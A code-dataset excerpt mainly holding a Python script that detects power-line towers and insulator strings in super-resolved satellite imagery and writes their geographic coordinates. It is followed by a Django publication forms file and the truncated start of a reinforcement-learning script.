'/' + each_dir.split('/')[-1].split('.')[0] \\\r\n + '_' + str(start_x) + '_' + str(end_x) + '_' + str(start_y) + '_' + str(end_y) + '.' + out_type\r\n #out_dir_images = out_dir + '/' + str(i) + '_' + str(j) + '.' + out_type\r\n #out_dir_images = out_dir + '/' + '_' + str(start_x) + '_' + str(end_x) + '_' + str(start_y) + '_' + str(end_y) + '.' 
+ out_type\r\n\r\n out_image = Image.fromarray(temp_image)\r\n out_image.save(out_dir_images)\r\n\r\n src_path = 'I:/project_insulator/code/FPN_Tensorflow-master/tools/Tif_Cut/6.tif' # 带地理影像\r\n assign_spatial_reference_byfile(args.OutPath, out_dir_images)\r\n\r\n count += 1\r\n print('End of ' + str(count) + '/' + str(len(data_dir_list)) + '...')\r\n time_end = time.time()\r\n print('Time cost: ', time_end - time_start)\r\n print('Cut Finsh!')\r\n return 0\r\n\r\ndef combine(data_dir, w, h, c, out_dir, out_type='tif', file_type=['tif', 'tiff']):\r\n '''\r\n 合并裁剪识别后的影像\r\n :param data_dir: 识别后的裁剪影像\r\n w:整景影像的宽\r\n h:整景影像的高\r\n c: 通道数,默认为3,RGB\r\n out_dir:合并的文件路径\r\n :return: None\r\n '''\r\n if not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n img_dir, img_name = get_file_names(data_dir, file_type)\r\n print('\\n')\r\n print('Combine begining for ', str(len(img_dir)), ' images.....')\r\n dir_dict = get_same_img(img_dir, img_name)\r\n count = 0\r\n for key in dir_dict.keys():\r\n temp_label = np.zeros(shape=(w, h, c), dtype=np.uint8)\r\n dir_list = dir_dict[key]\r\n for item in dir_list:\r\n name_split = item.split('_')\r\n x_start = int(name_split[-4])\r\n x_end = int(name_split[-3])\r\n y_start = int(name_split[-2])\r\n y_end = int(name_split[-1].split('.')[0])\r\n img = Image.open(item)\r\n img = np.array(img)\r\n temp_label[x_start:x_end, y_start:y_end, :] = img\r\n\r\n img_name = key + '.' + out_type\r\n new_out_dir = out_dir + '/' + img_name\r\n temp_label = np.transpose(temp_label, (2, 0, 1))\r\n write_img_dt(new_out_dir, temp_label)\r\n #由于inference之后影像丧失了坐标信息,这里通过与原始影像进行地理坐标融合\r\n assign_spatial_reference_byfile(args.OutPath, new_out_dir)\r\n count += 1\r\n print('End of ' + str(count) + '/' + str(len(dir_dict)) + '...')\r\n print('Combine Finsh!')\r\n return 0\r\n\r\n#从空间坐标系转换到地理坐标系得到杆塔坐标范围\r\ndef Get_coordinate(geoTransform, box, x_cut, y_cut):\r\n '''\r\n 获得地理坐标\r\n :param geoTransform: GDAL地理数据\r\n box:输出的识别框空间分辨率坐标\r\n x_cut:分割影像的x坐标增加量\r\n y_cut:分割影像的y坐标增加量\r\n :return: 地理坐标\r\n '''\r\n column_left = box[0] + y_cut\r\n row_left = box[1] + x_cut\r\n column_right = box[2] + y_cut\r\n row_right = box[3] + x_cut\r\n Xmap_left = geoTransform[0] + column_left * geoTransform[1] + row_left * geoTransform[2]\r\n Ymap_left = geoTransform[3] + column_left * geoTransform[4] + row_left * geoTransform[5]\r\n Xmap_right = geoTransform[0] + column_right * geoTransform[1] + row_right * geoTransform[2]\r\n Ymap_right = geoTransform[3] + column_right * geoTransform[4] + row_right * geoTransform[5]\r\n return Xmap_left, Ymap_left, Xmap_right, Ymap_right\r\n\r\ndef getSRSPair(dataset):\r\n '''\r\n 获得给定数据的投影参考系和地理参考系\r\n :param dataset: GDAL地理数据\r\n :return: 投影参考系和地理参考系\r\n '''\r\n prosrs = osr.SpatialReference()\r\n prosrs.ImportFromWkt(dataset.GetProjection())\r\n geosrs = prosrs.CloneGeogCS()\r\n return prosrs, geosrs\r\n\r\ndef geo2lonlat(src_path, x_left, y_left, x_right, y_right):\r\n '''\r\n 将投影坐标转为经纬度坐标(具体的投影坐标系由给定数据确定)\r\n :param dataset: GDAL地理数据\r\n :param x: 投影坐标x\r\n :param y: 投影坐标y\r\n :return: 投影坐标(x, y)对应的经纬度坐标(lon, lat)\r\n '''\r\n dataset = gdal.Open(src_path)\r\n prosrs, geosrs = getSRSPair(dataset)\r\n ct = osr.CoordinateTransformation(prosrs, geosrs)\r\n coords_left = ct.TransformPoint(x_left, y_left)\r\n coords_right = ct.TransformPoint(x_right, y_right)\r\n return coords_left[:2], coords_right[:2]\r\n'''定义识别杆塔号模块'''\r\ndef Haversine(lon1, lat1, lon2, lat2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\r\n\r\n # 将十进制度数转化为弧度\r\n lon1, lat1, lon2, lat2 = map(math.radians, [lon1, lat1, 
lon2, lat2])\r\n # haversine公式\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n a = math.sin(dlat / 2) ** 2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2\r\n # c = 2 * math.asin(math.sqrt(a))\r\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n r = 6371 # 地球平均半径,单位为公里\r\n return c * r * 1000\r\ndef get_tower_label(excel_path, lon, lat):\r\n df = pd.read_excel(excel_path)\r\n dis = df.apply(lambda x: Haversine(x['经度'], x['纬度'], lon, lat), axis=1)\r\n index_get = dis.nsmallest(1).index\r\n return index_get[0], df['杆塔编号'][index_get[0]], df['线路'][index_get[0]]\r\n'''定义绝缘子串识别模块'''\r\ndef reduce_tensor(inp):\r\n \"\"\"\r\n Reduce the loss from all processes so that\r\n process with rank 0 has the averaged results.\r\n \"\"\"\r\n world_size = get_world_size()\r\n if world_size < 2:\r\n return inp\r\n with torch.no_grad():\r\n reduced_inp = inp\r\n dist.reduce(reduced_inp, dst=0)\r\n return reduced_inp\r\n\r\ndef test(config, test_dataset, testloader, model,\r\n sv_dir='output', sv_pred=True):\r\n args = parse_args()\r\n mask_path = []\r\n model.eval()\r\n with torch.no_grad():\r\n for _, batch in enumerate(tqdm(testloader)):\r\n image, size, name = batch\r\n size = size[0]\r\n pred = test_dataset.multi_scale_inference(\r\n model,\r\n image,\r\n scales=config.TEST.SCALE_LIST,\r\n flip=config.TEST.FLIP_TEST)\r\n\r\n if pred.size()[-2] != size[0] or pred.size()[-1] != size[1]:\r\n pred = F.upsample(pred, (size[-2], size[-1]),\r\n mode='bilinear')\r\n\r\n if sv_pred:\r\n name_null = []\r\n name = name[0]\r\n name_null.append(name)\r\n sv_path = sv_dir\r\n if not os.path.exists(sv_path):\r\n os.mkdir(sv_path)\r\n test_dataset.save_pred(pred, sv_path, name_null)\r\n mask_path.append(sv_path + '/' + str(name[0])[2:] + '.png')\r\n del name_null[:]\r\n\r\n\r\ndef insulator_detect():\r\n args = parse_args()\r\n # logger.info(pprint.pformat(args))\r\n # logger.info(pprint.pformat(config))\r\n\r\n # cudnn related setting\r\n # cudnn.benchmark = config.CUDNN.BENCHMARK\r\n # cudnn.deterministic = config.CUDNN.DETERMINISTIC\r\n # cudnn.enabled = config.CUDNN.ENABLED\r\n\r\n # build model\r\n model = get_seg_model(config)\r\n if args.SateType == 'WV':\r\n model_state_file = './models/Insulatormodels/best_WV.pth'\r\n elif args.SateType == 'SV1':\r\n model_state_file = './models/Insulatormodels/best_SV1.pth'\r\n dump_input = torch.rand(\r\n (1, 3, config.TRAIN.IMAGE_SIZE[1], config.TRAIN.IMAGE_SIZE[0])\r\n )\r\n pretrained_dict = torch.load(model_state_file, map_location='cpu')\r\n model_dict = model.state_dict()\r\n pretrained_dict = {k: v for k, v in pretrained_dict.items()\r\n if k in model_dict.keys()}\r\n model_dict.update(pretrained_dict)\r\n model.load_state_dict(model_dict)\r\n\r\n # gpus = list(config.GPUS)\r\n # model = nn.DataParallel(model, device_ids=gpus).cuda()\r\n # model = nn.DataParallel(model, device_ids=gpus)\r\n\r\n # prepare data\r\n test_size = (config.TEST.IMAGE_SIZE[1], config.TEST.IMAGE_SIZE[0])\r\n test_dataset = Cityscapes(\r\n root=config.DATASET.ROOT,\r\n test_img_files='./Tower/',\r\n if_test=True,\r\n num_samples=None,\r\n num_classes=config.DATASET.NUM_CLASSES,\r\n multi_scale=False,\r\n flip=False,\r\n ignore_label=config.TRAIN.IGNORE_LABEL,\r\n base_size=config.TEST.BASE_SIZE,\r\n crop_size= test_size,\r\n downsample_rate=1)\r\n testloader = torch.utils.data.DataLoader(\r\n test_dataset,\r\n batch_size=1,\r\n shuffle=False,\r\n num_workers=config.WORKERS,\r\n pin_memory=True)\r\n # start = timeit.default_timer()\r\n test(config,\r\n test_dataset,\r\n 
testloader,\r\n model,\r\n sv_dir='./insulator')\r\n\r\n # end = timeit.default_timer()\r\n # logger.info('Mins: %d' % np.int((end - start) / 60))\r\n\r\ndef show_in_img(x, y, final_output_dir, tower_area):\r\n img_mask = cv2.imread(y, 0)\r\n img_mask_array = np.array(img_mask)\r\n img_plt = cv2.imread(x)\r\n contours_cv, hierarchy = cv2.findContours(img_mask_array, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n name_txt = x.split('\\\\')[-1]\r\n name_txt_ture = name_txt.split('.')[0]\r\n for i in range(0, len(contours_cv)):\r\n x_right = np.max(contours_cv[i][:, :, 0]) + int(tower_area[0][0])\r\n x_left = np.min(contours_cv[i][:, :, 0]) + int(tower_area[0][0])\r\n y_right = np.max(contours_cv[i][:, :, 1]) + int(tower_area[0][1])\r\n y_left = np.min(contours_cv[i][:, :, 1]) + int(tower_area[0][1])\r\n area = (x_right - x_left) * (y_right - y_left)\r\n if area < 200:\r\n pass\r\n elif area >4500:\r\n pass\r\n else:\r\n cv2.rectangle(img_plt, (x_left, y_left), (x_right, y_right), (0, 0, 255), 1)\r\n cv2.imwrite(x, img_plt)\r\n\r\ndef show_in_img_multi(x, y, final_output_dir, tower_area):\r\n img_mask = cv2.imread(y, 0)\r\n img_mask_array = np.array(img_mask)\r\n img_plt = cv2.imread(x)\r\n contours_cv, hierarchy = cv2.findContours(img_mask_array, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n name_txt = x.split('\\\\')[-1]\r\n name_txt_ture = name_txt.split('.')[0]\r\n for i in range(0, len(contours_cv)):\r\n x_right = np.max(contours_cv[i][:, :, 0]) + int(tower_area[0])\r\n x_left = np.min(contours_cv[i][:, :, 0]) + int(tower_area[0])\r\n y_right = np.max(contours_cv[i][:, :, 1]) + int(tower_area[1])\r\n y_left = np.min(contours_cv[i][:, :, 1]) + int(tower_area[1])\r\n area = (x_right - x_left) * (y_right - y_left)\r\n if area < 200:\r\n pass\r\n elif area >4500:\r\n pass\r\n else:\r\n cv2.rectangle(img_plt, (x_left, y_left), (x_right, y_right), (0, 0, 255), 1)\r\n cv2.imwrite(x, img_plt)\r\n\r\ndef detect(det_net, inference_save_path, real_test_imgname_list):\r\n '''检测过程'''\r\n # 1. preprocess img\r\n img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. 
not GBR\r\n img_batch = tf.cast(img_plac, tf.float32)\r\n img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,\r\n target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN,\r\n length_limitation=cfgs.IMG_MAX_LENGTH)\r\n img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)\r\n img_batch = tf.expand_dims(img_batch, axis=0)# [1, None, None, 3]\r\n\r\n detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(\r\n input_img_batch=img_batch,\r\n gtboxes_batch=None)\r\n\r\n init_op = tf.group(\r\n tf.global_variables_initializer(),\r\n tf.local_variables_initializer()\r\n )\r\n\r\n restorer, restore_ckpt = det_net.get_restorer()\r\n\r\n config = tf.ConfigProto()\r\n config.gpu_options.allow_growth = True\r\n #定义存放坐标信息的空数组\r\n Map_write = []\r\n Geo_write = []\r\n box_write = []\r\n Geo_write_show = []\r\n do_insulator_list = '500'\r\n excel_path = './test.xls'\r\n with tf.Session(config=config) as sess:\r\n sess.run(init_op)\r\n if not restorer is None:\r\n restorer.restore(sess, restore_ckpt)\r\n print('restore model')\r\n\r\n for i, a_img_name in enumerate(real_test_imgname_list):\r\n\r\n raw_img = cv2.imread(a_img_name)\r\n one_data0 = np.unique(raw_img[:, :, 0])\r\n one_data1 = np.unique(raw_img[:, :, 1])\r\n one_data2 = np.unique(raw_img[:, :, 2])\r\n if one_data0.any() == [0] and one_data1.any() == [0] and one_data2.any() == [0]:\r\n # start = time.time()\r\n nake_name = a_img_name.split('/')[-1]\r\n cv2.imwrite(inference_save_path + '/' + nake_name,\r\n raw_img)\r\n # end = time.time()\r\n # tools.view_bar('{} image cost {}s'.format(a_img_name, (end - start)), i + 1,\r\n # len(real_test_imgname_list))\r\n else:\r\n start = time.time()\r\n resized_img, detected_boxes, detected_scores, detected_categories = \\\r\n sess.run(\r\n [img_batch, detection_boxes, detection_scores, detection_category],\r\n feed_dict={img_plac: raw_img[:, :, ::-1]} # cv is BGR. 
But need RGB\r\n )\r\n end = time.time()\r\n\r\n #show_indices = detected_scores >= cfgs.SHOW_SCORE_THRSHOLD\r\n if args.SateType == 'SV1':\r\n show_indices = detected_scores >= args.Threshold_SV1\r\n elif args.SateType == 'WV':\r\n show_indices = detected_scores >= args.Threshold_WV\r\n show_scores = detected_scores[show_indices]\r\n show_boxes = detected_boxes[show_indices]\r\n show_categories = detected_categories[show_indices]\r\n\r\n labes = np.ones(shape=[len(show_boxes), ], dtype=np.float32) * ONLY_DRAW_BOXES\r\n scores = np.zeros_like(labes)\r\n # 为了防止检测到的杆塔范围没有把杆塔囊括完,将检测框略微扩大\r\n if args.SateType == 'SV1':\r\n for i in range(0, len(show_boxes)):\r\n get_area_weight = show_boxes[i][2] - show_boxes[i][0]\r\n get_area_height = show_boxes[i][3] - show_boxes[i][1]\r\n if get_area_weight < 196:\r\n fit1 = (196 - get_area_weight) / 2\r\n show_boxes[i][0] = show_boxes[i][0] - fit1\r\n show_boxes[i][2] = show_boxes[i][2] + fit1\r\n if show_boxes[i][0] < 0:\r\n show_boxes[i][0] = 0\r\n if show_boxes[i][2] < 0:\r\n show_boxes[i][2] = 0\r\n if get_area_height < 196:\r\n fit2 = (196 - get_area_height) / 2\r\n show_boxes[i][1] = show_boxes[i][1] - fit2\r\n show_boxes[i][3] = show_boxes[i][3] + fit2\r\n if show_boxes[i][1] < 0:\r\n show_boxes[i][1] = 0\r\n if show_boxes[i][3] < 0:\r\n show_boxes[i][3] = 0\r\n img_get = raw_img\r\n img_box = img_get[int(show_boxes[i][1]):int(show_boxes[i][3]),\r\n int(show_boxes[i][0]):int(show_boxes[i][2]), :]\r\n cv2.imwrite('./Tower' + '/' + '%d_' % i + a_img_name.split('/')[-1],\r\n img_box)\r\n elif args.SateType == 'WV':\r\n for i in range(0, len(show_boxes)):\r\n get_area_weight = show_boxes[i][2] - show_boxes[i][0]\r\n get_area_height = show_boxes[i][3] - show_boxes[i][1]\r\n if get_area_weight < 300:\r\n fit1 = (300 - get_area_weight) / 2\r\n show_boxes[i][0] = show_boxes[i][0] - fit1\r\n show_boxes[i][2] = show_boxes[i][2] + fit1\r\n if show_boxes[i][0] < 0:\r\n show_boxes[i][0] = 0\r\n if show_boxes[i][2] < 0:\r\n show_boxes[i][2] = 0\r\n if get_area_height < 300:\r\n fit2 = (300 - get_area_height) / 2\r\n show_boxes[i][1] = show_boxes[i][1] - fit2\r\n show_boxes[i][3] = show_boxes[i][3] + fit2\r\n if show_boxes[i][1] < 0:\r\n show_boxes[i][1] = 0\r\n if show_boxes[i][3] < 0:\r\n show_boxes[i][3] = 0\r\n img_get = raw_img\r\n img_box = img_get[int(show_boxes[i][1]):int(show_boxes[i][3]),\r\n int(show_boxes[i][0]):int(show_boxes[i][2]), :]\r\n cv2.imwrite('./Tower' + '/' + '%d_' % i + a_img_name.split('/')[-1],\r\n img_box)\r\n #获取对应的坐标信息\r\n nake_name = a_img_name.split('/')[-1]\r\n out_dir_images = inference_save_path + '/' + nake_name\r\n mask_name = a_img_name.split('/')[-1]\r\n mask_name = mask_name.split('.')[0]\r\n Map_initial = assign_spatial_reference_byfile_coordinate(args.OutPath)\r\n name_split = nake_name.split('_')\r\n x_start = int(name_split[-4])\r\n y_start = int(name_split[-2])\r\n show_write = []\r\n del show_write[:]\r\n del Geo_write_show[:]\r\n for box in show_boxes:\r\n Map = Get_coordinate(Map_initial, box, x_start, y_start)\r\n Geo = geo2lonlat(args.OutPath, Map[0], Map[1], Map[2], Map[3])\r\n Map_write.append([nake_name, Map])\r\n Geo_write.append([nake_name, Geo])\r\n Geo_write_show.append([nake_name, Geo])\r\n box_write.append([nake_name, show_boxes])\r\n for one in Geo_write_show:\r\n if one[1]:\r\n lon = (one[1][0][1] + one[1][1][1]) / 2\r\n lat = (one[1][0][0] + one[1][1][0]) / 2\r\n _, tower_label_show, line_show = get_tower_label('./Tower_line.xls', lon, lat)\r\n show_write.append([line_show, tower_label_show])\r\n # 
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(np.squeeze(resized_img, 0),\r\n # boxes=show_boxes,\r\n # labels=show_categories,\r\n # scores=show_scores,\r\n # tower_labels=show_write)\r\n final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(np.squeeze(resized_img, 0),\r\n boxes=show_boxes,\r\n labels=show_categories,\r\n scores=show_scores)\r\n\r\n cv2.imwrite(inference_save_path + '/' + nake_name,\r\n final_detections[:, :, ::-1])\r\n insulator_dir = './insulator/'\r\n Tower_dir = './Tower/'\r\n ### 产生问题原因为,mask图被覆盖了\r\n if args.DOInsulator == 'True':\r\n if show_write:\r\n if do_insulator_list in show_write[0][0]:\r\n # print('ssssssssssssssssssss')\r\n if len(show_boxes):\r\n if len(show_boxes) >1:\r\n for i in range(0, len(show_boxes)):\r\n insulator_detect()\r\n show_in_img_multi(args.save_cutdetect_dir + '/' + a_img_name.split('/')[-1], './insulator/' + '%d_' % i + mask_name + '.png', args.save_cutdetect_dir, show_boxes[i])\r\n\r\n # show_in_img_multi('./Test_result/' + a_img_name.split('/')[-1], './insulator/' + '%d_' % i + mask_name + '.png', './Test_result', show_boxes[i])\r\n del_file(insulator_dir)\r\n # del_file(Tower_dir)\r\n else:\r\n insulator_detect()\r\n show_in_img(args.save_cutdetect_dir + '/' + a_img_name.split('/')[-1], './insulator/' + '0_' + mask_name + '.png',\r\n args.save_cutdetect_dir, show_boxes)\r\n # show_in_img('./Test_result/' + a_img_name.split('/')[-1], './insulator/' + '0_' + mask_name + '.png',\r\n # './Test_result', show_boxes)\r\n del_file(insulator_dir)\r\n # del_file(Tower_dir)\r\n #分割后检测的影像会丢失地理坐标信息,这里和原图进行地理坐标信息的融合,检测后的影像也会带有地理坐标信息了\r\n out_dir_images = inference_save_path + '/' + nake_name\r\n assign_spatial_reference_byfile(args.OutPath, out_dir_images)\r\n Map_initial = assign_spatial_reference_byfile_coordinate(args.OutPath)\r\n tools.view_bar('{} image cost {}s'.format(a_img_name, (end - start)), (i + 1), len(real_test_imgname_list))\r\n ########################################\r\n #把坐标结果写到txt中\r\n with open(args.txt_save_dir + \"/\" + \"Map_Coordinate.txt\", \"w\") as f:\r\n for i in Map_write:\r\n f.write(str(i[0]))\r\n f.write(' ')\r\n if i[1]:\r\n f.write(str(i[1]))\r\n f.write('\\n')\r\n else:\r\n f.write(\"No tower\")\r\n f.write('\\n')\r\n f.close()\r\n with open(args.txt_save_dir + \"/\" + \"Geo_Coordinate.txt\", \"w\") as f:\r\n for i in Geo_write:\r\n f.write(str(i[0]))\r\n f.write(' ')\r\n if i[1]:\r\n lon = (i[1][0][1] + i[1][1][1]) / 2\r\n lat = (i[1][0][0] + i[1][1][0]) / 2\r\n _, tower_label, line = get_tower_label('./Tower_line.xls', lon, lat)\r\n f.write(str(i[1]))\r\n f.write(' ')\r\n f.write(str(line) + str(tower_label) + '号杆塔')\r\n f.write('\\n')\r\n else:\r\n f.write(\"No tower\")\r\n f.write('\\n')\r\n f.close()\r\n with open(args.txt_save_dir + \"/\" + \"box.txt\", \"w\") as f:\r\n for i in box_write:\r\n f.write(str(i[0]))\r\n f.write(' ')\r\n if i[1].any():\r\n f.write(str(i[1]))\r\n f.write('\\n')\r\n else:\r\n f.write(\"No tower\")\r\n f.write('\\n')\r\n f.close()\r\n\r\n\r\ndef inference(test_dir, inference_save_path):\r\n\r\n test_imgname_list = [os.path.join(test_dir, img_name) for img_name in os.listdir(test_dir)\r\n if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]\r\n assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' 
\\\r\n                                          ' Note that we only support image formats .jpg, .jpeg, .png, .tif and .tiff.'\r\n    if args.SateType == 'WV':\r\n        faster_rcnn = build_whole_network_WV.DetectionNetwork(base_network_name=cfgs.NET_NAME,\r\n                                                              is_training=False)\r\n    elif args.SateType == 'SV1':\r\n        faster_rcnn = build_whole_network.DetectionNetwork(base_network_name=cfgs.NET_NAME,\r\n                                                           is_training=False)\r\n    detect(det_net=faster_rcnn, inference_save_path=inference_save_path, real_test_imgname_list=test_imgname_list)\r\n\r\n\r\ndef parse_args():\r\n    \"\"\"\r\n    Parse input arguments\r\n    \"\"\"\r\n    parser = argparse.ArgumentParser(description='TestImgs... You need to provide the test dir')\r\n    parser.add_argument('InPath', type=str, help='Input image path')\r\n    parser.add_argument('OutPath', type=str, help='Output path')\r\n    parser.add_argument('SateType', type=str, help='Satellite type, one of: SV1, GF2, GF1, WV. Note: for tower detection always choose the SV1 or WV model; due to satellite resolution, only SV1 and WV are currently supported for detection')\r\n    parser.add_argument('ModType', type=str, help='Model type, one of: WDSR, SRGAN, SRGAN_Noise')\r\n    parser.add_argument('Stretch', type=str, help='Whether to apply grayscale stretching: True -> stretch, False -> no stretch. Note: tower detection requires stretching')\r\n    parser.add_argument('FakeColor', type=str, help='Whether to write false-color output: True -> false-color output, False -> 4-channel output. Note: tower detection requires false-color output')\r\n    parser.add_argument('DoWhole', type=str, help='Whether to process the whole scene: '\r\n                                                  'True -> whole scene (suitable for large images), '\r\n                                                  'False -> only part of the image (faster)')\r\n    parser.add_argument('UseGPU', type=str, help='Whether to use the GPU: True -> GPU, False -> CPU')\r\n    parser.add_argument('DoDetection', type=str, help='Whether to detect towers: True -> detect towers, False -> super-resolution only')\r\n    parser.add_argument('DOInsulator', type=str, help='Whether to detect insulator strings: True -> detect insulator strings, False -> super-resolution and tower detection only')\r\n    parser.add_argument('Savecutdetect', type=str, help='Whether to keep intermediate results: True -> keep, False -> discard')\r\n    parser.add_argument('--Threshold_SV1', type=float, default=0.92, help='Detection threshold for SuperView-1 towers; tune it according to your results. Default 0.92')\r\n    parser.add_argument('--Threshold_WV', type=float, default=0.96, help='Detection threshold for WorldView towers; tune it according to your results. Default 0.96')\r\n    parser.add_argument('--cut_data_dir', dest='cut_data_dir',\r\n                        help='Folder holding the super-resolved images, used as input for tower detection',\r\n                        default='./save', type=str)\r\n    parser.add_argument('--save_cutdetect_dir', dest='save_cutdetect_dir',\r\n                        help='Output path for the per-tile detection results',\r\n                        default='./Test_result', type=str)\r\n    parser.add_argument('--combine_save_data_dir', dest='combine_save_data_dir',\r\n                        help='Folder for the merged detection results',\r\n                        default='./combine', type=str)\r\n    parser.add_argument('--txt_save_dir', dest='txt_save_dir',\r\n                        help='Folder for the coordinate txt output; defaults to Txt in the program directory. Note: always required, since both SR-only and SR-plus-detection runs write output here',\r\n                        default='./Txt', type=str)\r\n    parser.add_argument('--localhost', dest='localhost',\r\n                        help='Callback URL that receives the success or failure status of the run',\r\n                        default='http://localhost:8091/inspection?taskId=1234', type=str)\r\n    if len(sys.argv) == 1:\r\n        parser.print_help()\r\n        sys.exit(1)\r\n\r\n    args = parser.parse_args()\r\n    update_config(config, args)\r\n\r\n    return args\r\n
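\r\n\r\n# Example invocation (illustrative only -- the paths and flag values below are hypothetical,\r\n# the positional argument order follows parse_args() above):\r\n# python inference.py ./in/scene.tif ./out/scene_sr.tif SV1 WDSR True True False True True True False --Threshold_SV1 0.92\r\n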
\r\nif __name__ == '__main__':\r\n    # Parse the input arguments\r\n    args = parse_args()\r\n    # Super-resolution part\r\n    # try:\r\n    if args.UseGPU == 'True':\r\n        use_gpu = True\r\n        GPU = '0'\r\n    else:\r\n        use_gpu = False\r\n        GPU = '-1'\r\n    os.environ[\"CUDA_VISIBLE_DEVICES\"] = GPU\r\n    if args.DoDetection == 'True':\r\n        DoSR(args.InPath, args.ModType, args.OutPath, args.Stretch, args.FakeColor, args.SateType, args.DoWhole, use_gpu)\r\n        # Get the image size\r\n        data_size = read_img_dt(args.OutPath)\r\n        # Directories for the cropped tiles\r\n        cut_save_data_dir = './Out'\r\n        data_dir = './Out/'\r\n        if not os.path.exists(cut_save_data_dir):\r\n            os.mkdir(cut_save_data_dir)\r\n        if not os.path.exists(args.save_cutdetect_dir):\r\n            os.mkdir(args.save_cutdetect_dir)\r\n        cut(args.cut_data_dir, cut_save_data_dir, file_type=['tif', 'tiff'], out_type='tif', out_size=1024)\r\n        inference(data_dir,\r\n                  inference_save_path=args.save_cutdetect_dir)\r\n        combine(args.save_cutdetect_dir, w=data_size.shape[1], h=data_size.shape[2], c=3, out_dir=args.combine_save_data_dir, out_type='tif', file_type=['tif'])\r\n        # After detection, remove the cropped tiles\r\n        for root, dirs, files in os.walk(cut_save_data_dir):\r\n            for name in files:\r\n                if name.endswith(\".tif\"):\r\n                    os.remove(os.path.join(root, name))\r\n        if args.Savecutdetect == 'False':\r\n            del_file(args.save_cutdetect_dir)\r\n        with open(args.txt_save_dir + \"/\" + \"Finished.txt\", \"w\") as f:\r\n            f.write(\"Finished!\")\r\n    else:\r\n        DoSR(args.InPath, args.ModType, args.OutPath, args.Stretch, args.FakeColor, args.SateType, args.DoWhole,\r\n             use_gpu)\r\n        with open(args.txt_save_dir + \"/\" + \"Finished.txt\", \"w\") as f:\r\n            f.write(\"Finished!\")\r\n    # try:\r\n    #     print('Program succeeded, the success message is being passed to the callback address')\r\n    #     requests.get(args.localhost + '&status=success')\r\n    #     print('callback sent successfully!')\r\n    # except:\r\n    #     print('Error in callback address passing')\r\n    # except:\r\n    #     try:\r\n    #         print('Program error, the failure message is being passed to the callback address')\r\n    #         requests.get(args.localhost + '&status=fail')\r\n    #         print('callback sent successfully!')\r\n    #     except:\r\n    #         print('Error in callback address passing')","repo_name":"hardworking-jws/insulator-detection-remote-sensing","sub_path":"Tools/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":77721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21153123181","text":"from django import forms\nfrom django.forms.extras.widgets import SelectDateWidget\nfrom django.forms.widgets import HiddenInput\n\nfrom publication.models import Book, Category, Issue, Periodical, Publisher, \\\n    PUBLICATION_TYPES\n\n\nclass PublisherForm(forms.ModelForm):\n    class Meta:\n        model = Publisher\n        fields = ('name', 'address', 'telephone', 'website')\n\n\nclass BookForm(forms.ModelForm):\n    file_upload = forms.FileField()\n    book_id = forms.CharField(widget=HiddenInput)\n\n    def clean(self):\n        if 'book_id' in self.cleaned_data:  # update\n            if 'file_upload' in self._errors:\n                del self._errors['file_upload']  # file upload isn't required\n        else:  # create\n            del self._errors['book_id']\n        return self.cleaned_data\n\n    class Meta:\n        model = Book\n        exclude = ('publisher', 'status', 'pending_until', 'categories')\n\n\nclass PeriodicalForm(forms.ModelForm):\n    class Meta:\n        model = Periodical\n        exclude = ('periodical_type', 'publisher', 'categories')\n\n\nclass IssueForm(forms.ModelForm):\n    file_upload = forms.FileField()\n    issue_id = forms.CharField(widget=HiddenInput)\n\n    def clean(self):\n        if 'issue_id' in self.cleaned_data:  # update\n            if 'file_upload' in self._errors:\n                del self._errors['file_upload']  # file upload isn't required\n        else:  # create\n            del self._errors['issue_id']\n        return self.cleaned_data\n\n    class Meta:\n        model = Issue\n        exclude = ('periodical', 'status', 'pending_until')\n        widgets = {\n            'issued_at': SelectDateWidget()\n        }\n\n\nclass CategoryForm(forms.ModelForm):\n    class Meta:\n        model = Category\n","repo_name":"opendream/openreader","sub_path":"publication/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"43347304358","text":"from scipy import 
special\nfrom tempfile import TemporaryDirectory\nimport png\nimport environment\nfrom replay_buffer import Buffer\nimport socket\nimport multiprocessing\nimport subprocess\nimport numpy as np\nfrom numpy import pi, log\nimport tensorflow as tf\nimport tensorflow.contrib.layers as tl\nimport time\nimport viewer\nimport os\nimport filelock\n\n\ndef actions_dict_from_array(actions):\n return {\n \"Arm1_to_Arm2_Left\": actions[0],\n \"Ground_to_Arm1_Left\": actions[1],\n \"Arm1_to_Arm2_Right\": actions[2],\n \"Ground_to_Arm1_Right\": actions[3]\n }\n\n\ndef lrelu(x):\n alpha = 0.2\n return tf.nn.relu(x) * (1 - alpha) + x * alpha\n\n\ndef exponential_moving_stats(ten, alpha):\n mean, var = tf.nn.moments(ten, axes=0)\n std = tf.sqrt(var)\n moving_mean = tf.Variable(tf.zeros_like(mean))\n moving_mean_assign = moving_mean.assign(alpha * moving_mean + (1 - alpha) * mean)\n moving_std = tf.Variable(tf.ones_like(std))\n moving_std_assign = moving_std.assign(alpha * moving_std + (1 - alpha) * std)\n cond = tf.less(tf.shape(ten)[0], 2)\n moving_mean_cond = tf.cond(cond, lambda: moving_mean, lambda: moving_mean_assign)\n moving_std_cond = tf.cond(cond, lambda: moving_std, lambda: moving_std_assign)\n return moving_mean_cond, moving_std_cond\n\n\ndef normalize(ten, alpha):\n mean, std = exponential_moving_stats(ten, alpha)\n return (ten - mean) / (std + 1e-5)\n\n\ndef get_cluster(n_parameter_servers, n_workers):\n spec = {}\n port = get_available_port(2222)\n for i in 